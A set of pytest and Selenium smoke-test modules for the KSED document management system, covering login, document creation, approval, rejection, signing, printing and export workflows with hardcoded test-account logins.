#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11639 import KSEDLogin
@allure.feature('Авторизация')
@pytest.mark.KSED_smoke_test
def test_11639(web_browser):
    """Verify that a user can log in."""
    login_page = KSEDLogin(web_browser)
    login_page.LogIN('StroganovSN', 'Changeme!')  # authentication is asserted inside the page object
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11664 import KSEDCreatDocPD
from KSED.Tests.tk13799 import KSEDCreatDocPDSoglas
from KSED.Tests.tk11955 import KSEDCreatDocPDSoglas_sendDorab
from KSED.Tests.tk14079 import KSEDPDSoglas
from KSED.Tests.tk11957 import KSEDPDPodpisanie_Otklon
@allure.feature('Создание Произвольного документа')
@pytest.mark.KSED_smoke_test_prior
def test_11664(web_browser):
    """Create an arbitrary document (PD)."""
    pd_page = KSEDCreatDocPD(web_browser)
    pd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    pd_page.Creat()                            # create the document
    pd_page.LinkDocWFile()                     # save the link between document and file
@allure.feature('Направление Произвольного документа на согласование')
@pytest.mark.KSED_smoke_test
def test_13799(web_browser):
    """Send an arbitrary document (PD) for approval."""
    pd_page = KSEDCreatDocPDSoglas(web_browser)
    pd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    pd_page.getDoc()                           # open the previously created document
    pd_page.attachment()                       # add an attachment
    pd_page.NapSoglasovanie()                  # send for approval
@allure.feature('Возврат произвольного документа на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
def test_11955(web_browser):
    """Return an arbitrary document for rework during approval.

    NOTE(review): per the original author, this test fails because the approver
    does not receive a notification (known bug).
    """
    pd_page = KSEDCreatDocPDSoglas_sendDorab(web_browser)
    pd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    pd_page.getDoc()                           # open the document
    pd_page.REJECTED()                         # reject and return the document for rework
    pd_page.NapSoglasovanie()                  # send for approval again
@allure.feature('Согласование произвольного документа.')
@pytest.mark.KSED_smoke_test
def test_14079(web_browser):
    """Approve an arbitrary document."""
    approval_page = KSEDPDSoglas(web_browser)
    approval_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    approval_page.getDoc()                           # open the document
    approval_page.Soglasovanie()                     # perform the approval
@allure.feature('Отклонение подписания и возврат ПД на доработку.')
@pytest.mark.KSED_smoke_test
def test_11957(web_browser):
    """Decline signing and return the arbitrary document (PD) for rework."""
    signing_page = KSEDPDPodpisanie_Otklon(web_browser)
    signing_page.LogIN('tst_gid', '12345')  # sign in as the signer
    signing_page.getDoc()                   # open the document
    signing_page.Podpisanie_Otklon()        # decline signing
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11652 import KSEDCreatDocPVH
@allure.feature('Создание Пакет входящей корреспонденции')
@pytest.mark.KSED_smoke_test
def test_11652(web_browser):
    """Create an incoming-correspondence package."""
    pvh_page = KSEDCreatDocPVH(web_browser)
    pvh_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    pvh_page.Creat()                            # create the package
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11655 import KSEDCreatDocPor
from KSED.Tests.tk13862 import KSEDCreatDocPorNSoglas
from KSED.Tests.tk11778 import KSEDCreatDocPorSoglas
from KSED.Tests.tk11943 import KSEDCreatDocPorDorab
from KSED.Tests.tk12936 import KSEDDocPorSendAllure
from KSED.Tests.tk12935 import KSEDCreatDocPorNIspoln
@allure.feature('Создание Поручения')
@pytest.mark.KSED_smoke_test_prior
def test_11655(web_browser):
    """Create an assignment (Poruchenie)."""
    assignment_page = KSEDCreatDocPor(web_browser)
    assignment_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    assignment_page.Creat()                            # create the assignment
    assignment_page.LinkDocWFile()                     # save the document/file link
@allure.feature('Направление Поручения на согласование')
@pytest.mark.KSED_smoke_test
def test_13862(web_browser):
    """Send an assignment for approval."""
    assignment_page = KSEDCreatDocPorNSoglas(web_browser)
    assignment_page.LogIN('StroganovSN', 'Changeme!')    # sign in
    assignment_page.getDoc()                             # open the assignment
    assignment_page.creation_of_the_approval_route()     # build the approval route
    assignment_page.attachment()                         # add an attachment
    assignment_page.NapSoglasovanie()                    # send for approval
@allure.feature('Cогласование поручения')
@pytest.mark.KSED_smoke_test
def test_11778(web_browser):
    """Approve an assignment."""
    approver_page = KSEDCreatDocPorSoglas(web_browser)
    approver_page.LogIN('YatskinRS', 'Changeme!')  # sign in as the approver
    approver_page.getDoc()                         # open the assignment
    approver_page.Soglasovanie()                   # perform the approval
@allure.feature('Отправка отчета в поручении после согласования')
@pytest.mark.KSED_smoke_test
def test_12936(web_browser):
    """Send a report within an assignment after it has been approved."""
    report_page = KSEDDocPorSendAllure(web_browser)
    report_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    report_page.getDoc()                           # open the assignment
    report_page.sendAllure()                       # submit the report
@allure.feature('Направление Поручения на исполнение')
@pytest.mark.KSED_smoke_test
def test_12935(web_browser):
    """Send an assignment for execution."""
    assignment_page = KSEDCreatDocPorNIspoln(web_browser)
    assignment_page.LogIN('StroganovSN', 'Changeme!')    # sign in
    assignment_page.Creat()                              # create the assignment
    assignment_page.creation_of_the_approval_route()     # build the route
    assignment_page.attachment()                         # add an attachment
    assignment_page.NapIspolnenie()                      # send for execution
@allure.feature('Возврат поручения на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
def test_11943(web_browser):
    """Return an assignment for rework during approval.

    Three stages in one browser session: create the assignment, send it for
    approval, then reject it as the approver.
    """
    # Stage 1: create the assignment
    creator = KSEDCreatDocPor(web_browser)
    creator.LogIN('StroganovSN', 'Changeme!')
    creator.Creat()
    creator.LinkDocWFile()
    # Stage 2: send for approval (reuses the session opened in stage 1)
    sender = KSEDCreatDocPorNSoglas(web_browser)
    sender.getDoc()
    sender.creation_of_the_approval_route()
    sender.attachment()
    sender.NapSoglasovanie()
    sender.USER_LOGOUTs()  # log out
    # Stage 3: reject the approval
    approver = KSEDCreatDocPorDorab(web_browser)
    approver.LogIN('YatskinRS', 'Changeme!')  # sign in as the document's approver
    approver.getDoc()
    approver.REJECTED()  # reject and return the document for rework
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11775 import KSEDuser_LOGOUT
from KSED.Tests.tk11774 import Edit_Password
from KSED.Tests.tk11772 import KSEDmyprofile
from KSED.Tests.tk11773 import KSEDlogicESM
from KSED.Tests.tk11728 import Edit_Profile
from KSED.Tests.tk11727 import KSEDAbsence
@allure.feature('Выход из системы')
@pytest.mark.KSED_smoke_test
def test_11775(web_browser):
    """Log out of the system."""
    session_page = KSEDuser_LOGOUT(web_browser)
    session_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    session_page.USER_LOGOUTs()                     # log out
@allure.feature('Изменение пароля пользователя')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11774(web_browser):
    """ Change the user's password. """
    page = Edit_Password(web_browser)
    LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
    # NOTE(review): '12345' is passed as both the old and the new password, yet the
    # session was opened with 'Changeme!' above and is re-opened with 'Changeme!'
    # below — confirm the intended old/new argument values against Edit_Password.
    edit_password = page.edit_password('12345', '12345') # enter the old and the new password
    # Verify the change took effect: log out and sign back in
    logout = page.USER_LOGOUTs()
    LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Страница профиля пользователя')
@pytest.mark.KSED_smoke_test
def test_11772(web_browser):
    """Open the user profile page."""
    profile_page = KSEDmyprofile(web_browser)
    profile_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    profile_page.getMyprofile()                     # open "My profile"
@allure.feature('Страница Логика ECM.Мой профиль')
@pytest.mark.KSED_smoke_test
def test_11773(web_browser):
    """Open the "Logika ECM. My profile" page."""
    ecm_page = KSEDlogicESM(web_browser)
    ecm_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    ecm_page.getLogicESM()                      # open the Logika ECM profile page
@allure.feature('Изменение профиля')
@pytest.mark.KSED_smoke_test
def test_11728(web_browser):
    """Edit the user profile."""
    profile_page = Edit_Profile(web_browser)
    profile_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    profile_page.edit_profile()                     # apply profile changes
@allure.feature('Включить отсутствие: "Меня нет в офисе"')
@pytest.mark.KSED_smoke_test
def test_11727(web_browser):
    """Enable the absence flag: "Меня нет в офисе".

    BUG FIX: this function was named test_11773, which duplicated (and therefore
    shadowed) the earlier test_11773 in this module, so pytest collected only one
    of the two tests. Renamed to test_11727 to match the test case (tk11727 /
    KSEDAbsence) it exercises.
    """
    page = KSEDAbsence(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # sign in
    page.getLogicESM()                      # open the Logika ECM profile page
    page.Absence()                          # enable the absence flag
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11669 import KSEDCreatDocP
from KSED.Tests.tk13756 import KSEDCreatDocPSoglas
from KSED.Tests.tk11952 import KSEDCreatDocP_sendDorab
@allure.feature('Создание Протокола')
@pytest.mark.KSED_smoke_test
def test_11669(web_browser):
    """Create a protocol document."""
    protocol_page = KSEDCreatDocP(web_browser)
    protocol_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    protocol_page.Creat()                            # create the protocol
@allure.feature('Направление Протокола на согласование')
@pytest.mark.KSED_smoke_test
def test_13756(web_browser):
    """Create a protocol and send it for approval."""
    protocol_page = KSEDCreatDocPSoglas(web_browser)
    protocol_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    protocol_page.Creat()                            # create the protocol
    protocol_page.attachment()                       # add an attachment
    protocol_page.addPoruchenie()                    # add an assignment item
    protocol_page.NapSoglasovanie()                  # send for approval
@allure.feature('Возврат протокола на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
def test_11952(web_browser):
    """Return a protocol for rework during approval.

    Creates and submits a protocol as the initiator, then rejects it as the
    approver in the same browser.
    """
    protocol_page = KSEDCreatDocP_sendDorab(web_browser)
    # Initiator: create and submit
    protocol_page.LogIN('StroganovSN', 'Changeme!')
    protocol_page.Creat()                 # create the document
    protocol_page.attachment()            # add an attachment
    protocol_page.addPoruchenie()         # add an assignment item
    protocol_page.NapSoglasovanie()       # send for approval
    protocol_page.USER_LOGOUTs()          # log out
    # Approver: open via notification and reject
    protocol_page.LogIN('YatskinRS', 'Changeme!')
    protocol_page.notificationOpen()      # open notifications and jump to the document
    protocol_page.REJECTED()              # reject and return the document for rework
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11674 import KSEDCreatDocRD
from KSED.Tests.tk11706 import KSEDDocPDNapSoglas
from KSED.Tests.tk12915 import KSEDRDSoglas_sendDorab
from KSED.Tests.tk12929 import KSEDRD_sendPodpis
from KSED.Tests.tk12907 import KSEDRD_DorabPodpis
from KSED.Tests.tk12934 import KSEDRD_Podpis
@allure.feature('Создание РД')
@pytest.mark.KSED_smoke_test_prior
def test_11674(web_browser):
    """Create an administrative document (RD)."""
    rd_page = KSEDCreatDocRD(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    rd_page.Creat()                            # create the document
    rd_page.LinkDocWFile()                     # save the document/file link
@allure.feature('Направление РД на согласование')
@pytest.mark.KSED_smoke_test
def test_11706(web_browser):
    """Send an administrative document (RD) for approval."""
    rd_page = KSEDDocPDNapSoglas(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')    # sign in
    rd_page.getDoc()                             # open the document
    rd_page.attachment()                         # add an attachment
    rd_page.addPunkt()                           # add a clause
    rd_page.creation_of_the_approval_route()     # build the approval route
    rd_page.rassilka()                           # configure the distribution list
    rd_page.NapSoglasovanie()                    # send for approval
@allure.feature('Возврат РД на доработку с согласования')
@pytest.mark.KSED_smoke_test
def test_12915(web_browser):
    """Return an administrative document (RD) for rework from approval."""
    rd_page = KSEDRDSoglas_sendDorab(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    rd_page.getDoc()                           # open the document
    rd_page.REJECTED()                         # reject and return for rework
@allure.feature('Направление РД на подписание')
@pytest.mark.KSED_smoke_test
def test_12929(web_browser):
    """Send an administrative document (RD) for signing."""
    rd_page = KSEDRD_sendPodpis(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    rd_page.getDoc()                           # open the document
    rd_page.NapPodpis()                        # send for signing
@allure.feature('Возврат РД на доработку с подписания')
@pytest.mark.KSED_smoke_test
def test_12907(web_browser):
    """Return an administrative document (RD) for rework from signing."""
    rd_page = KSEDRD_DorabPodpis(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    rd_page.getDoc()                           # open the document
    rd_page.Podpisanie_Otklon()                # decline signing
    rd_page.NapPodpis()                        # send for signing again
@allure.feature('Подписание РД')
@pytest.mark.KSED_smoke_test
def test_12934(web_browser):
    """Sign an administrative document (RD)."""
    rd_page = KSEDRD_Podpis(web_browser)
    rd_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    rd_page.getDoc()                           # open the document
    rd_page.Podpis()                           # sign it
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11679 import KSEDCreatDocReestr
@allure.feature('Создание Реестра')
@pytest.mark.KSED_smoke_test
def test_11679(web_browser):
    """Create a registry document.

    NOTE: test data must be refreshed before every run — dataTest.BARCODE
    cannot reuse the same document for registry creation twice.
    """
    registry_page = KSEDCreatDocReestr(web_browser)
    registry_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    registry_page.Creat()                            # create the registry
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk12957 import KSEDCreatDocREZ
@allure.feature('Создание Резолюции')
@pytest.mark.KSED_smoke_test
def test_12957(web_browser):
    """Create a resolution."""
    resolution_page = KSEDCreatDocREZ(web_browser)
    resolution_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    resolution_page.Creat()                            # create the resolution
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11691 import KSEDCreatDocSZ
from KSED.Tests.tk11704 import KSEDnaprSZSoglas
from KSED.Tests.tk12913 import KSEDPrintAttach
from KSED.Tests.tk12912 import KSEDPrintForm
@allure.feature('Создание Служебной записки')
@pytest.mark.KSED_smoke_test
def test_11691(web_browser):
    """Create an internal memo (SZ)."""
    memo_page = KSEDCreatDocSZ(web_browser)
    memo_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    memo_page.Creat()                            # create the memo
    memo_page.LinkDocWFile()                     # save the document/file link
@allure.feature('Направление СЗ на согласование')
@pytest.mark.KSED_smoke_test
def test_11704(web_browser):
    """Send an internal memo (SZ) for approval."""
    memo_page = KSEDnaprSZSoglas(web_browser)
    memo_page.LogIN('StroganovSN', 'Changeme!')    # sign in
    memo_page.getDoc()                             # open the memo
    memo_page.creation_of_the_approval_route()     # build the approval route
    memo_page.attachment()                         # add an attachment
    memo_page.NapSoglasovanie()                    # send for approval
@allure.feature('Печать вложений документа')
@pytest.mark.KSED_smoke_test
def test_12913(web_browser):
    """Print a document's attachments."""
    print_page = KSEDPrintAttach(web_browser)
    print_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    print_page.getDoc()                           # open the document
    print_page.printAttach()                      # print the attachments
@allure.feature('Печать в разделе "Печатные формы"')
@pytest.mark.KSED_smoke_test
def test_12912(web_browser):
    """Print from the "Printed forms" section."""
    print_page = KSEDPrintForm(web_browser)
    print_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    print_page.getDoc()                           # open the document
    print_page.printForm()                        # print via the printed-forms section
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... allure generate ./allure_report && allure open allure-report
# # -s команда вывода всех print в консоль
#
#
#
import pytest
import allure
from KSED.Tests.tk12022 import KSEDallurInDoc
from KSED.Tests.tk12029 import KSEDallurReestr
from KSED.Tests.tk12030 import KSEDallurResolution
from KSED.Tests.tk12011 import KSEDStatAllureVidDic
from KSED.Tests.tk12006 import KSEDallur
from KSED.Tests.tk11677 import KSEDCreateZap
from KSED.Tests.tk11702 import KSEDredZap
from KSED.Tests.tk11742 import KSEDexpZap
from KSED.Tests.tk11744 import KSEDexp_Zap
from KSED.Tests.tk11705 import KSEDdelZap
@pytest.mark.KSED_smoke_test
def test_11677(web_browser):
    """Create a query."""
    query_page = KSEDCreateZap(web_browser)
    query_page.LogIN('StroganovSN', 'Changeme!')  # sign in; query creation runs inside the page object
@pytest.mark.KSED_smoke_test
def test_11702(web_browser):
    """Edit a query."""
    query_page = KSEDredZap(web_browser)
    query_page.LogIN('StroganovSN', 'Changeme!')  # sign in; editing runs inside the page object
@pytest.mark.KSED_smoke_test
def test_11742(web_browser):
    """Actions on selected documents within a query."""
    query_page = KSEDexpZap(web_browser)
    query_page.LogIN('StroganovSN', 'Changeme!')  # sign in; the scenario runs inside the page object
@pytest.mark.KSED_smoke_test
def test_11744(web_browser):
    """Export documents."""
    export_page = KSEDexp_Zap(web_browser)
    export_page.LogIN('StroganovSN', 'Changeme!')  # sign in; the export runs inside the page object
@pytest.mark.KSED_smoke_test
def test_11705(web_browser):
    """Delete a query."""
    query_page = KSEDdelZap(web_browser)
    query_page.LogIN('StroganovSN', 'Changeme!')  # sign in; deletion runs inside the page object
--- FILE SEPARATOR ---
# Наведение
# self.vlozheniya.move_to_element()
# self.attachments.wait_to_be_clickable()
# self.attachments.click()
# Ожидание и нажатие на кнопку
# self.dropBtn_2.scroll_to_element()
# self.dropBtn_2.wait_to_be_clickable()
# self.dropBtn_2.click()
# обновить страницу
# self.get(self._web_driver.current_url)
# ожидание пока не пропадет "Загрузка"
#self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# Проверка появилась ли кнопка
# try:
# self.btnRejectInnerSogl.wait_to_be_clickable()
# except:
# assert False, 'Кнопка не появилась'
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11645 import KSEDCreatDocISH
from KSED.Tests.tk11644 import KSEDCreatDocVH
from KSED.Tests.tk11679 import KSEDCreatDocReestr
from KSED.Tests.tk11691 import KSEDCreatDocSZ
from KSED.Tests.tk12929 import KSEDRD_sendPodpis
from KSED.Tests.T715 import KSEDreturnDisAfterTakeTask
from KSED.Tests.T716 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.T717 import KSEDsoftDisAfterTakeTask
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11645(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocISH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11644(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocVH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
# def test_11679(web_browser):
#
# """ Создание реестра """
#
# page = KSEDCreatDocReestr(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
# def test_11691(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocSZ(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
#
# def test_12929(web_browser):
#
# """ Направление на согласование РД """
#
# page = KSEDRD_sendPodpis(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# getDoc = page.getDoc()
#
# NaprNaSogl = page.NapPodpis()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11644(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocVH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
@pytest.mark.KSED_smoke_test
def test_18361(web_browser):
    """Recall of a decision after the delegate has taken and rejected the task.

    Flow: create a document, build the approval route and send for approval;
    the delegate takes the task and rejects it; the main approver then recalls
    the decision.
    """
    # Step 1: create the document
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: re-open the document and build the approval route
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: add an attachment and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: take the task as the delegate and reject it
    page2 = KSEDreturnDisAfterTakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    page2.rejectDoc()
    # BUG FIX: was page.USER_LOGOUTs() — log out through the page object whose session is active
    page2.USER_LOGOUTs()
    # Step 5: recall the decision as the main approver
    page3 = KSEDreturnDisAfterTakeTask(web_browser)
    page3.LogIN('YatskinRS', 'Changeme!')
    # BUG FIX: was page2.getDoc() — open the document with the page object that just logged in
    page3.getDoc()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18362(web_browser):
    """Softening of the delegate's decision after the main approver rejects approval.

    Flow: create a document, build the approval route and send for approval;
    the main approver rejects; the delegate then softens the decision.
    """
    # Step 1: create the document
    page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route
    page.creation_of_the_approval_route()
    # Step 3: add an attachment and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: reject the approval as the main approver
    page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # BUG FIX: was page.USER_LOGOUTs() — log out through the page object whose session is active
    page2.USER_LOGOUTs()
    # Step 5: soften the decision as the delegate
    page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page3.LogIN('tst_user1', 'Changeme!')
    # BUG FIX: was page2.getDoc() — open the document with the page object that just logged in
    page3.getDoc()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18363(web_browser):
    """Softening of a decision after the delegate has taken and rejected the task.

    Flow: create a document, build the approval route and send for approval;
    the delegate takes the task and rejects it; the main approver then softens
    the decision.
    """
    # Step 1: create the document
    page = KSEDsoftDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: re-open the document and build the approval route
    page = KSEDsoftDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: add an attachment and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: take the task as the delegate and reject it
    page2 = KSEDsoftDisAfterTakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    page2.rejectDoc()
    # BUG FIX: was page.USER_LOGOUTs() — log out through the page object whose session is active
    page2.USER_LOGOUTs()
    # Step 5: soften the decision as the main approver
    page3 = KSEDsoftDisAfterTakeTask(web_browser)
    page3.LogIN('YatskinRS', 'Changeme!')
    # BUG FIX: was page2.getDoc() — open the document with the page object that just logged in
    page3.getDoc()
    page3.softDecision_RD()
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_15772 --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_smoke.py --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_18338 --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v --driver IE --driver-path WebDriver\IEDriverServer --alluredir ./allure_report
#IEDriver
# #.... allure generate ./allure_report && allure open allure-report
# # -s flag makes pytest print all print() output to the console
#
#
#
import pytest
import allure
from KSED.Tests.T681 import KSEDCreatDocCS_RD
from KSED.Tests.T682 import KSEDCreatDocCS_LND
from KSED.Tests.T683 import KSEDCreatDocCS_ETC
from KSED.Tests.T685 import KSEDCreatWaySogl
from KSED.Tests.T686 import KSEDCreatWaySogl_RD
from KSED.Tests.T684 import KSEDaddPerson
from KSED.Tests.T687 import KSEDNaprSogl_RD
from KSED.Tests.T688 import KSEDaddNewVersion
from KSED.Tests.T689 import KSEDaddNewAtt
from KSED.Tests.T691 import KSEDreject_RD
from KSED.Tests.T690 import KSEDacceptSogl_RD
from KSED.Tests.T692 import KSEDinnerSogl_RD
from KSED.Tests.T693 import KSEDrejectInnerSogl_RD
from KSED.Tests.T694 import KSEDrejectTaskInnerSogl_RD
from KSED.Tests.T695 import KSEDrepeatInnerSogl_RD
from KSED.Tests.T696 import KSEDAcceptInnerSogl_RD
from KSED.Tests.T697 import KSEDaddComment
from KSED.Tests.T700 import KSEDtakeTask
from KSED.Tests.T701 import KSEDbackTask
from KSED.Tests.T702 import KSEDreturnDecision_RD
from KSED.Tests.T703 import KSEDsoftDecision_RD
from KSED.Tests.T704 import KSEDchangeAfterRejectInnerSogl_RD
from KSED.Tests.T705 import KSEDsoftDesAfterRejectInnerSogl_RD
from KSED.Tests.T706 import KSEDchangeAfterAcceptInnerSogl_RD
from KSED.Tests.T707 import KSEDchangeAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.T708 import KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.T709 import KSEDaddCommentInnerSogl_RD
from KSED.Tests.T710 import KSEDInnerSoglAfterAddComment_RD
from KSED.Tests.T711 import KSEDacceptSoglwithRemark_RD
from KSED.Tests.T712 import KSEDrejectAfterAcceptSoglwithRemark_RD
